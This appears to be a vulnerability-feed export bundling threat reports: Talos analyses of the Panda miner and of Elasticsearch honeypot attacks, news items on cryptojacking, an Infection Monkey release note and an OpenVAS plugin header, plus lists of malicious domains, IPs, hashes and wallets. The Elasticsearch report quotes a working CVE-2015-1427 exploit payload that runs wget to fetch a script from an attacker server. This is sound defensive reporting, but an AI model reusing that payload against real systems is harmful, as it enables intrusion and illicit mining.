\n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "modified": "2019-09-17T08:09:45", "published": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-01T16:16:02", "bulletinFamily": "blog", "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-1273", "CVE-2018-7600"], "description": "__ \n \n_[Christopher Evans](<https://twitter.com/ccevans002>) of Cisco Talos conducted the research for this post._ \n \n\n\n## Executive Summary\n\n \nCisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads. \n \n\n\n## Introduction\n\n \nThrough ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots. \n \nFor example CVE-2015-1427: \n\n\n> { \n \"size\": 1, \n \"script_fields\": { \n \"lupin\": { \n \"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"wget http://45.76.122.92:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\\\").getText()\" \n } \n } \n}\n\n \nThe most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs. \n \nThis bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary. \n \nTalos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners. \n \nA third actor attempts to download a file named \"LinuxT\" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures. \n \nAs part of our research, we observed that, in some cases, hosts that attempted to download the \"LinuxT\" sample also dropped payloads that executed the command \"echo 'qq952135763.'\" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions. \n \n \n\n\n_\"About Me\" page of the attacker's personal website linking to the same QQ account number as in the command above._\n\n \n\n\nThis website also links to the potential attacker's Gitee page. Gitee is a Chinese code-sharing website similar to Github or Atlassian. \n \n \n\n\n_Attacker's Gitee page._\n\n \n\n\nAlthough the projects associated with this Gitee profile are not explicitly malicious, Talos has linked this QQ account to a profile on Chinese hacking forum xiaoqi7, as well as a history of posts on topics related to exploits and malware on other forums. We briefly reviewed the public account activity of 952135763 and found several posts related to cyber security and exploitation, but nothing specific to this activity. While this information could tell us more about the attacker, there is insufficient information currently to draw any firm conclusions. \n \nOur honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both \"echo 'qq952135763'\" and \"echo '952135763,'\" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the \"LinuxT\" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one. \n \nThe three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an \"rm *\" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands. \n \n\n\n## Conclusion\n\n \nTalos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the \"LinuxT\" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases. \n \n\n\n## Coverage\n\n \nThe following SNORT\u24c7 rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org. \n \n**CVE-2014-3120:** 33830, 36256, 44690 \n \n**CVE-2015-1427:** 33814,36067 \n \n**CVE-2017-10271:** 45304 \n \n**CVE-2018-7600:** 46316 \n \n**CVE-2018-1273:** 46473 \n \nAdditional ways our customers can detect and block this threat are listed below. \n \n \nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nEmail Security can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat. \n \nAMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. \n \nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \n\n\n## IOCs:\n\n \n**First Actor:** \n \n**Attacking IP addresses:** \n \n101[.]200[.]48[.]68 \n117[.]205[.]7[.]194 \n107[.]182[.]183[.]206 \n124[.]43[.]19[.]159 \n139[.]99[.]131[.]57 \n179[.]50[.]196[.]228 \n185[.]165[.]116[.]144 \n189[.]201[.]192[.]242 \n191[.]189[.]30[.]112 \n192[.]210[.]198[.]50 \n195[.]201[.]169[.]194 \n216[.]15[.]146[.]34 \n43[.]240[.]65[.]121 \n45[.]76[.]136[.]196 \n45[.]76[.]178[.]34 \n52[.]8[.]60[.]118 \n54[.]70[.]161[.]251 \n139[.]159[.]218[.]82 \n \n**IP addresses and ports hosting malware:** \n \n45[.]76[.]122[.]92:8506 \n207[.]148[.]70[.]143:8506 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 e2f1be608c2cece021e68056f2897d88ed855bafd457e07e62533db6dfdc00dc \n191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c \n2bcc9fff40053ab356ddde6de55077f8bf83d8dfa6d129c250f521eb170dc123 \n9a181c6a1748a9cfb46751a2cd2b27e3e742914873de40402b5d40f334d5448c 5fe3b0ba0680498dbf52fb8f0ffc316f3a4d7e8202b3ec710b2ae63e70c83b90 \n7b08a8dae39049aecedd9679301805583a77a4271fddbafa105fa3b1b507baa3 \n \n**Second Actor:** \n \n**Attacking IP address:** \n \n202[.]109[.]143[.]110 \n \n**IP address and port hosting malware:** \n \n216[.]176[.]179[.]106:9090 \n \n**SHA256 of delivered malware:** \n \nbbd6839074adea734213cc5e40a0dbb31c4c36df5a5bc1040757d6baec3f8415 \n \n**Third Actor:** \n \n**Attacking IP addresses:** \n \n125[.]231[.]139[.]75 \n36[.]235[.]171[.]244 \n \n**IP addresses linked to QQ account, but not delivering malware:** \n \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n**IP address and port hosting malware:** \n \n104[.]203[.]170[.]198:5522 \n \n**SHA256 of malware hosted on above IP address:** \n \n7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a \n \n**Remaining actors:** \n \n**Attacking IP addresses:** \n \n111[.]19[.]78[.]4 \n15[.]231[.]235[.]194 \n221[.]203[.]81[.]226 \n111[.]73[.]45[.]90 \n121[.]207[.]227[.]84 \n125[.]77[.]30[.]184 \n \n\n\n", "modified": "2019-03-01T15:56:50", "published": "2019-02-26T10:56:00", "id": "TALOSBLOG:3F14583676BF3FEC18226D8E465C8707", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/uGLhJU8rCm8/cisco-talos-honeypot-analysis-reveals.html", "type": "talosblog", "title": "Cisco Talos Honeypot Analysis Reveals Rise in Attacks on Elasticsearch Clusters", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2021-02-01T12:26:49", "bulletinFamily": "info", "cvelist": ["CVE-2016-3088", "CVE-2017-10271"], "description": "[](<https://thehackernews.com/images/-QW-VuiqP65I/YBfiIyrUF2I/AAAAAAAABpg/3YIgJQiDql0yh7jOStv7rboKaQhJ5jHPQCLcBGAsYHQ/s0/malware.jpg>)\n\nA financially-motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of their malware to target cloud infrastructures using vulnerabilities in web server technologies, according to new research.\n\nDeployed by the China-based cybercrime group **Rocke**, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as harbors new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers [said](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>) in a Thursday write-up.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\n\"Pro-Ocean uses known vulnerabilities to target cloud applications,\" the researchers detailed. \"In our analysis, we found Pro-Ocean targeting Apache ActiveMQ ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)), Oracle WebLogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and Redis (unsecure instances).\"\n\n\"Once installed, the malware kills any process that uses the CPU heavily, so that it's able to use 100% of the CPU and mine Monero efficiently.\"\n\nFirst documented by [Cisco Talos](<https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html>) in 2018, Rocke has been found to distribute and execute crypto-mining malware using a varied toolkit that includes Git repositories and different payloads such as shell scripts, JavaScript backdoors, as well as portable executable files.\n\n[](<https://thehackernews.com/images/-zGuFNfU5HYA/YBfio2D1i3I/AAAAAAAABpo/peoOu7OnqKUPriJPrJfEV-QX12XX4jSRwCLcBGAsYHQ/s0/cyber.jpg>)\n\nWhile prior variants of the malware banked on the capability to target and remove cloud security products developed by Tencent Cloud and Alibaba Cloud by [exploiting flaws](<https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/>) in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion, Pro-Ocean has expanded the breadth of those attack vectors by aiming at Apache ActiveMQ, Oracle WebLogic, and Redis servers.\n\nBesides its self-spreading features and better hiding techniques that allow it to stay under the radar and spread to unpatched software on the network, the malware, once installed sets about uninstalling monitoring agents to dodge detection and removing other malware and miners from the infected systems.\n\nTo achieve this, it takes advantage of a native Linux feature called LD_PRELOAD to mask its malicious activity, a library named [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>) to stay hidden, and uses a Python infection script that takes the machine's public IP to infect all machines in the same 16-bit subnetwork (e.g., 10.0.X.X).\n\nPro-Ocean also works to eliminate competition by killing other malware and miners, including Luoxk, BillGates, XMRig, and Hashfish, running on the compromised host. In addition, it comes with a watchdog module written in Bash that ensures persistence and takes care of terminating all processes that utilize more than 30% of the CPU with the goal of mining Monero efficiently.\n\n\"This malware is an example that demonstrates that cloud providers' agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\" Unit 42 researcher Aviv Sasson said. \"This sample has the capability to delete some cloud providers' agents and evade their detection.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-01T11:15:16", "published": "2021-02-01T11:15:00", "id": "THN:EEB3BA59922DDC6B345B8E6C153593DA", "href": "https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html", "type": "thn", "title": "New Cryptojacking Malware Targeting Apache, Oracle, Redis Servers", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-04-18T13:41:28", "bulletinFamily": "info", "cvelist": ["CVE-2018-7600", "CVE-2017-10271"], "description": "[](<https://1.bp.blogspot.com/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s1600-e20/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://1.bp.blogspot.com/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s1600-e20/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://1.bp.blogspot.com/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s1600-e20/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn\u2019t do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "modified": "2018-04-18T09:50:03", "published": "2018-04-17T22:49:00", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "pentestit": [{"lastseen": "2018-12-03T23:18:27", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2018-12-03T22:28:53", "published": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-04-29T22:08:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-10063", "CVE-2017-10147", "CVE-2013-2027", "CVE-2017-10123", "CVE-2017-10334", "CVE-2017-5638", "CVE-2017-10152", "CVE-2017-10271", "CVE-2017-10352", "CVE-2017-10178", "CVE-2017-10148", "CVE-2017-10137", "CVE-2017-10336"], "description": "Oracle WebLogic Server is prone to multiple vulnerabilities.", "modified": "2020-04-27T00:00:00", "published": "2017-07-19T00:00:00", "id": "OPENVAS:1361412562310811244", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811244", "type": "openvas", "title": "Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Multiple Vulnerabilities (cpujul2017-3236622)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n 